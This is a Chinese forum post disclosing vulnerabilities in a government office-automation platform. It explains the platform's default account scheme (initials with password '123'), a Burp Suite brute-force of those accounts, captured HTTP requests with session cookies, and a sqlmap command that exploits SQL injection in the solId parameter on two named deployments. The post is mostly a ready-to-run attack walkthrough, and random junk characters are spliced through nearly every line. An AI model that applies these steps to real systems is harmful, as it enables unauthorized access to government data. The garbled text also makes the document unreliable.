|
' x: m( x3 h" e, ~$ L/ m4 {
G6 {9 P* v* ^- \# N" E 5 S8 H! v* p1 O# E
/ e8 w8 C" E) m$ W 平台简介:
. G: M, v9 H5 z7 z9 j % K+ P/ `' z! m0 Y5 ]+ P2 o
_0 m0 Z" t. x7 }3 J) O) e ) v5 Z: r9 Q3 Y# }2 r
* F h0 @/ F# k: e# l
$ b: d+ F) Z; V. _' c2 o: [1 B 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
6 a% P, {* C' W6 L- O
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
3 _; \& K4 A0 d2 T同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!& J" ], \' g. u" r* s
4 f+ O2 o, O* I' d/ w7 c
6 |( l" U8 ?% r8 ~
7 O; |+ U$ s% }. w3 R- Y; m - x2 l. V/ N7 w# J3 Y7 W9 i4 |- ?
: l7 z: ^2 ]- q
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:+ I* y t6 x5 q% o# q
4 B2 p- @! Q- R9 S
( X, t# u( p! g5 l ' ?8 T4 Z( Q( x% n5 y1 b+ y1 i- a! g
& B' \4 [& E8 Z9 i q. L s# F2 H2 s
http://1.1.1.1:7197/cap-aco/#(案例2-)/ M# l$ [% B* V' m# V0 {- t8 X
5 R' c" f: Q) g/ k" J1 N
* L$ h* H1 p+ B9 ]% F- J: O http://www.XXOO.com (案例1-官网网站)
" |5 K9 Y Q; ]+ g4 l" @9 f; f1 d5 M 8 i4 y: b8 `, ~0 W. i: O6 b: S
1 B) K% k, O3 r# l7 O* T6 g
) |( y1 ^: }1 F* E- M$ Y; j
- j+ O$ Y0 z8 U+ v5 i4 } D6 N4 [" B4 f; ~4 i1 T# T
漏洞详情:/ Z, y/ W5 l2 V" F! q6 `
9 G | W5 U# \( e! Y% o6 f8 }! I( T& T4 |5 D
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
9 p- ^% }! K5 a8 Y# Z& Y' |6 |
% v7 M N8 h5 f4 m f# p, K! l) d+ o
$ D: ?* q5 G Q2 m/ D$ ~ 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:# P `3 N6 l9 S3 F+ ] y
* N7 X. E5 j0 p, I
% W6 X. H( f7 U7 T1 V m " [' N: Z; H( C9 q0 o
0 l. a5 X7 G5 a* F
: m: H" c, y8 a6 v5 U6 ^  ! w6 Q! o. G( [ z n' ^
( T; N: n' y' V" {
, {6 z D; Y! h3 f v8 T status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
! f# o3 b9 I1 W( X" s
* b. }' x! S4 c+ j V/ r" Z0 Z5 u. s# u) Z; k( A+ ^1 w2 D# W
1、案例1-官方网站9 `9 |% R( V4 o Y* O# u) }& k
+ q1 z1 k- m3 [2 t7 q6 V( i
% ^1 \4 }& M. Q GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.10 \" i* |/ m2 u$ h# [* N& a/ M/ {
( p5 Z9 z' I6 Y! }5 G+ T- L3 Z7 j, W- b4 j) b. T
Host: www.XXOO.com9 y6 ^ b- N# r- P. X
! E8 W7 C7 N0 b" h/ }
+ I) T; L; J2 ~" d2 H Proxy-Connection: Keep-Alive
% U. m/ q5 a) V. N/ F3 ?
) j; n- f0 p) I: o) |: n1 o- H8 G# l% G& I3 l
Accept: application/json, text/javascript, */*; q=0.01
2 W1 ]/ `- e3 j& m! j
$ x }: r1 D5 D4 Y4 X7 L% i* C$ Q2 C" L* j. w. b
Accept-Language: zh-CN' m! A2 t/ W) f9 e6 w3 Q) M
6 i8 F/ N- @; m+ l8 I
8 n! O5 b! X" b" S Content-Type: application/json
- Z, @% i0 s& v7 h, k) |9 [ ' m" I0 I6 ]) U3 c& f
" J* c1 Q7 C7 L# S4 W1 I- P
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
- ?' k0 ^, L I3 r- f + w1 M! T+ P; m! v3 Y! `3 s
4 a1 R8 h5 w) W9 w. c
X-Requested-With: XMLHttpRequest7 _; L% W$ \. i0 \% Y0 \0 p' F
: j$ d4 b. K6 E4 O
4 N. _8 S1 X8 r5 k' t& h( o+ U& D! \ Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
+ ], r+ h* T$ B0 q" m 2 |" Y$ R$ g9 ]+ }" A$ {( [. [
+ D# C4 E) G& A% V/ B; |/ c9 J
Accept-Encoding: gzip, deflate, sdch
8 `6 n8 c ~7 j; \9 c2 r$ s
. r* U5 M% n! ?+ u! h% q7 x' @5 s% s" m9 e, P" z
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
6 X% B1 K. y9 Y7 l0 m! N+ M & g6 R4 i4 V: B7 k2 S$ U
0 _6 B" ~6 h o' C% _7 K$ \ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
4 s! T0 l" e6 S o$ H2 L. f9 g ) o/ u5 l! r* |5 T j
l; R- O8 s; b1 H
 , K9 T2 |; `& T6 B3 d0 x* R
8 v/ `; w2 z. F. ?8 B0 O! x
4 `9 S H! J" V7 ]3 s3 h; H
 1 N$ o7 L1 e; {5 A& i# _
1 J9 C& a8 d+ a' T( A
# M+ y( }+ A! Z/ ^; H
9 d8 Y: w6 s5 u- ^! j ! K/ n2 N4 G6 t: v6 s7 D9 K
* n5 f( z8 D8 R5 a
3 u' s% K) P# c% u0 s0 y ( G+ I# u( {: [& T& L; H' L
( T# Y4 T; I4 I8 Q7 r8 i- \# F
+ O% N9 W0 h# z/ v; O* m9 y/ u% O 6 N O" d! A! f9 k
& ?5 ?& l6 X- l" U* q3 X
2、案例2-某天河云平台
" J$ ]( M4 ], L6 X$ s 7 y+ E2 t$ A9 h* s) n3 W* A) B
$ A! V/ Q2 b! P2 _' ]+ b) s6 o+ q GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
! ?! a( q( R2 @ % M4 a! I4 Z0 G3 N, g1 ^
( z( n+ x/ Z! q$ H N/ V2 }- {3 z
Host: 1.1.1.:7197; w U( e. `+ u& F
$ D! `- P: O/ \# X, A% q1 H8 p K: e7 C$ ~0 n/ x3 u
Accept: application/json, text/javascript, */*; q=0.01
+ E- T# H: ?, L) V/ M7 T6 G% O 0 N2 S9 ]( _$ v# ~3 z( z/ I9 N
4 f _) w+ k F7 A' U X-Requested-With: XMLHttpRequest
3 ^" X$ u# p j- g( n ( v" _3 P1 P2 o* o' ?3 C
6 X5 N% B% {$ B |6 R% ]& T$ c; u
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
# _: M4 Y% c- I
P" f! T3 a9 z) R$ g* M" C6 s) j! k& @! r v) l1 }
Content-Type: application/json' _" x1 `; n' M" Y& Z# |8 P* s
) @* b9 d# a4 }( c; T5 b- G) V r+ u5 }1 V4 x j# q+ [2 ?
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10082 `, F9 E( }; _% ~3 M7 ]
* K# F- S! E' t, O6 p0 |
/ w b. k. u" R0 z7 } j
Accept-Language: zh-CN,zh;q=0.87 p7 C+ B0 d# y& U' s& X
& A2 b$ @- y% o) i
( Y r2 e0 q S/ q: r9 T B; ~7 ^* g Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
$ r: c6 {& a6 ]8 k* c, e7 |
7 a) f3 L* P2 e% y+ y* ~
, w" ~% L- K8 ^, l; s Connection: close
0 a' J" A7 L8 y
- j- ], d8 I& y, ]
+ e' [1 P# \ B 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
* ?* o! g% k+ y
) }+ r1 G3 [5 p3 r F$ T! v% D5 R- ~2 ^
) s B! s. ~' g$ ~" m8 t 
4 f! |* @0 B9 R" t0 ^) f4 @ + f$ F* d# l8 J$ d. u
, d7 i+ J! a5 ^' w8 ?2 o' B5 }
4 T9 a6 M" `5 i$ U7 ?7 E | 
发表于 2018-10-20 20:15:17
收藏
分享
支持
反对